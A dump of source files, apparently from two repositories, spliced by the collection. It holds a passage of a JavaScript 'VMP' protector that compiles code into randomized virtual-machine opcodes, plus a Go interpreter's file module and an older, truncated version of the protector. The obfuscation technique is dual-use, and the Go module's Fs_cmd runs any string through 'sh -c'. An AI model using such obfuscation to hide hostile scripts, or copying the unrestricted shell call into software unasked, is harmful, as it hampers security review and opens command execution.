for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = RandDataCheise(zhilDx.z190);;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z290))
}
// startgetType(node.left, variablePool, zhili)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else{
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z2))
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
function start(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync(outpath, cood + datatext, (e)=>{})
}
const tst = + new Date()
const soure = "t3.js"
const outpath = "./outsrc/out.js"
cbbjsvmp(soure, outpath);
// 转es6的插件有问题 readme有方法可转
// if (offes5 ===1){
// process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
// if (!error) {
// console.log("es6 to es5 ==> 成功");
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// } else {
// console.log("es6 to es5 ==> 失败");
// }
// });
// } else {
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// }
process.exec(`uglifyjs ./outsrc/out.js --output ./outsrc/out3.js`, (error, stdout, stderr) => {
if (!error) {
console.log("压缩 ==> 成功");
console.log("file is save ==> ./outsrc/out3.js");
process.exec(`node ./tool/pswitch.js`, (error, stdout, stderr) => {
if (!error) {
console.log("pswitch ==> 成功");
console.log("file is save ==> ./outsrc/out2.js");
process.exec(`uglifyjs ./outsrc/out2.js --mangle --output ./outsrc/out2.js`, (error, stdout, stderr) => {
if (!error) {
console.log("压缩 ==> 成功");
console.log("file is save ==> ./outsrc/out2.js");
process.exec(`node ./tool/jsdebugger.js`, (error, stdout, stderr) => {
if (!error) {
console.log("jsdebugger ==> 成功");
console.log("file is save ==> ./outsrc/out4.js");
console.log("user time =>", +new Date()-tst)
} else {
console.log("jsdebugger ==> 失败",error);
}
})
} else {``
console.log("压缩 ==> 失败",error);
}
})
} else {
console.log("pswitch ==> 失败", error);
}
})
} else {
console.log("压缩 ==> 失败", error);
}
})
|
2833844911/gojsvmp | 4,041 | fs/fs.go | package fs
import (
"bufio"
"fmt"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io"
"io/ioutil"
"myvmp/object"
"myvmp/token"
"os"
"os/exec"
)
type FileMy struct {
File *os.File
Encoding string
Ms string
}
func Fs_read(myfun *object.FunctionDeclarationObject) object.Object {
getbding := myfun.BindOb.(*FileMy)
reader := bufio.NewReader(getbding.File)
var content string
if getbding.Encoding == "utf-8" {
data, _ := ioutil.ReadAll(reader)
content = string(data)
} else if getbding.Encoding == "gbk" {
gbkReader := transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
data, _ := ioutil.ReadAll(gbkReader)
content = string(data)
} else {
// 默认utf-8
data, _ := ioutil.ReadAll(reader)
content = string(data)
}
return &object.StringObject{Value: content}
}
func Fs_cmd(myfun *object.FunctionDeclarationObject) object.Object {
ds := (*myfun.Args[0]).(*object.StringObject).Value
cmd := exec.Command("sh", "-c", ds)
// 获取命令输出,包括标准错误输出
output, err := cmd.CombinedOutput()
if err != nil {
fmt.Println("Error:", err)
return &object.BoolObject{Value: false}
}
return &object.StringObject{Value: string(output)}
}
func Fs_readCont(myfun *object.FunctionDeclarationObject) object.Object {
getbding := myfun.BindOb.(*FileMy)
reader := bufio.NewReader(getbding.File)
data, _ := ioutil.ReadAll(reader)
return &object.ByteObject{Value: data}
}
func Fs_close(myfun *object.FunctionDeclarationObject) object.Object {
ds := myfun.BindOb.(*FileMy).File.Close()
if ds != nil {
return &object.BoolObject{Value: false}
}
return &object.BoolObject{Value: true}
}
func Fs_write(myfun *object.FunctionDeclarationObject) object.Object {
ds := myfun.BindOb.(*FileMy).File
getbding := myfun.BindOb.(*FileMy)
dtt := *myfun.Args[0]
if dtt.Type() == token.BYTE {
wz := dtt.(*object.ByteObject).Value
ds.Write(wz)
} else {
wz := dtt.(*object.StringObject).Value
var writer *os.File
var err error
if getbding.Encoding == "utf-8" {
writer = ds
_, err = io.WriteString(writer, wz)
} else if getbding.Encoding == "gbk" {
writer2 := transform.NewWriter(ds, simplifiedchinese.GBK.NewEncoder())
_, err = io.WriteString(writer2, wz)
writer2.Close()
} else {
writer = ds
_, err = io.WriteString(writer, wz)
}
if err != nil {
return &object.BoolObject{Value: false}
}
}
return &object.BoolObject{Value: true}
}
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object, typeS string, Obj any) object.Object {
d := &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd, BindType: typeS, BindOb: Obj}
return d
}
func Fs_open(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
fsDt := object.NewEnv(nil)
fsDt.Store.Set(token.Iserror, &object.BoolObject{Value: true})
filePAth := (*dt).(*object.StringObject).Value
ms := "r"
encoding := "utf-8"
if len(myfun.Args) >= 2 {
configOb := (*myfun.Args[1]).(*object.Environment)
enc, ok := configOb.Store.Get(token.Fs_encoding)
if ok {
encoding = enc.ToString()
}
mse, ok := configOb.Store.Get(token.Fs_ms)
if ok {
ms = mse.ToString()
}
}
var file *os.File
var err error
if ms == "w" {
file, err = os.OpenFile(filePAth, os.O_WRONLY|os.O_CREATE, 0666)
} else if ms == "a" {
file, err = os.OpenFile(filePAth, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0666)
} else {
file, err = os.Open(filePAth)
}
if err != nil {
fmt.Printf("Error opening file: %v\n", err)
return fsDt
}
fsDt.Store.Set(token.Iserror, &object.BoolObject{Value: false})
fs_read := Fs_read
fs_readCont := Fs_readCont
fs_close := Fs_close
fs_write := Fs_write
dd := &FileMy{File: file, Encoding: encoding, Ms: ms}
fsDt.Store.Set(token.Fs_read, new_Func(&fs_read, token.File, dd))
fsDt.Store.Set(token.Fs_readCont, new_Func(&fs_readCont, token.File, dd))
fsDt.Store.Set(token.Fs_close, new_Func(&fs_close, token.File, dd))
fsDt.Store.Set(token.Fs_write, new_Func(&fs_write, token.File, dd))
return fsDt
}
|
2833844911/gojsvmp | 1,362 | require/require.go | package require
import (
"bufio"
"fmt"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io/ioutil"
"myvmp/object"
"os"
"strings"
)
type RequireInfo struct {
DtInfo map[string]*object.Environment
IsDo string
}
func ReadFile(Path string) string {
file, err := os.Open(Path)
if err != nil {
fmt.Printf("Error opening file: %v\n", err)
return ""
}
defer file.Close()
reader := bufio.NewReader(file)
flineee, err := reader.ReadString('\n')
if err != nil {
fmt.Printf("Error reading first line: %v\n", err)
return ""
}
fline := strings.TrimSpace(flineee)
firstLine := strings.Replace(fline, " ", "", -1)
var content string
if firstLine == "//--utf-8--" {
data, err := ioutil.ReadAll(reader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return ""
}
content = string(data)
} else if firstLine == "//--gbk--" {
gbkReader := transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
data, err := ioutil.ReadAll(gbkReader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return ""
}
content = string(data)
} else {
data, err := ioutil.ReadAll(reader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return ""
}
content = fline + "\n" + string(data)
}
content = strings.TrimSpace(content) + ";"
return content
}
|
2833844911/cy_jsvmp | 35,630 | oldjiamian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {hsjsvmpTo} = require("./tool/gooutmvp");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// 是否转es5
offes5 = 0
var fornum = 0
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
function RandDataArray(data) {
//混乱准备
var dataTemp = [].concat(data);
var dataBuffer = [];
var length = dataTemp.length;
//混乱数据
var randCount = 0;
var position = 0;
do {
var randvalue = (((length - randCount) - 1) + 1);
position = Math.floor(Math.random() * randvalue);
dataBuffer.push(dataTemp[position]);
randCount++;
dataTemp[position] = dataTemp[length - randCount];
} while (randCount < length);
return dataBuffer;
}
var zhil = [
1811,1810,551, 550, 291, 290, 252, 240, 200, 197, 195, 194, 192, 190, 181, 150, 105, 104, 90, 60, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45, 44, 40, 39, 38, 37, 36, 35, 34, 33, 32, 31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 20, 19, 11, 10, 8, 2, 1
]
zhenzhil = []
for (let i = 0; i < 100000; i++){
zhenzhil.push(i)
}
zhenzhil = RandDataArray(zhenzhil)
zhilDx = {}
for (let i2 = 0; i2 <zhil.length; i2++ ){
zhilDx["z"+zhil[i2]] = []
for (let i =0; i < 30; i++){
zhilDx["z"+zhil[i2]].push(zhenzhil.pop())
}
}
var d = JSON.stringify(zhilDx) +""
fs.writeFileSync("./dist/jiamain.json", d, (e)=>{})
function RandDataCheise(data){
var da = Math.floor(Math.random() * data.length);
return data[da]
}
function getchhduei(){
var duei = fs.readFileSync("./tool/cshshuzduei.js") + '';
duei = duei.replace(/this\.pop/g, "this.cf")
duei = duei.replace(/this\.push/g, "this.cF")
duei = duei.replace(/this\.shift/g, "this.Cf")
duei = duei.replace(/this\.xujia/g, "this.CF")
duei = duei.replace(/this\.length/g, "this.CFf")
var hu = []
for (var i = 2; i< 1000; i++){
hu.push(i)
}
hu = RandDataArray(hu)
var dat = '{"cbb1": [undefined, "cbbbhhhh", undefined],'
var sc = 1
for (let i =0; i< hu.length; i++){
dat = dat.replace("cbbbhhhh","cbb"+hu[i])
var d = `"${"cbb"+hu[i]}": ["${"cbb"+sc}", "cbbbhhhh", undefined],`
dat += d
sc = hu[i]
}
dat = dat.replace("cbbbhhhh","")
dat += '};'
duei = duei.replace("CbbTHALLYhh", dat)
return duei;
}
function cbbjsvmp(){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = getchhduei() + fs.readFileSync("./tool/jsvmp_outcs.js") + '';
dataText2 = dataText2.replace(/duei\.pop/g, "duei.cf")
dataText2 = dataText2.replace(/duei\.push/g, "duei.cF")
dataText2 = dataText2.replace(/duei\.shift/g, "duei.Cf")
dataText2 = dataText2.replace(/duei\.xujia/g, "duei.CF")
dataText2 = dataText2.replace(/duei\.length/g, "duei.CFf")
dataText2 = dataText2.replace(/g2\.pop/g, "g2.cf")
dataText2 = dataText2.replace(/g2\.push/g, "g2.cF")
dataText2 = dataText2.replace(/g2\.shift/g, "g2.Cf")
dataText2 = dataText2.replace(/g2\.xujia/g, "g2.CF")
dataText2 = dataText2.replace(/g2\.length/g, "g2.CFf")
// 指令扩展
dataText2 = hsjsvmpTo(dataText2)
// 函数隐藏
dataText2 = bindfun(dataText2)
// 变if else
dataText2 = switchtoif(dataText2)
//es6toes5
dataText = es6toes5(dataText)
// 变3元
for (let i = 0; i< 300; i++){
dataText2 = tosanyuan(dataText2)
}
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// 使用插件优化代码
// ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
if (node.test.type === "AssignmentExpression"){
startgetType(node.test.left, variablePool, zhili);
}
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
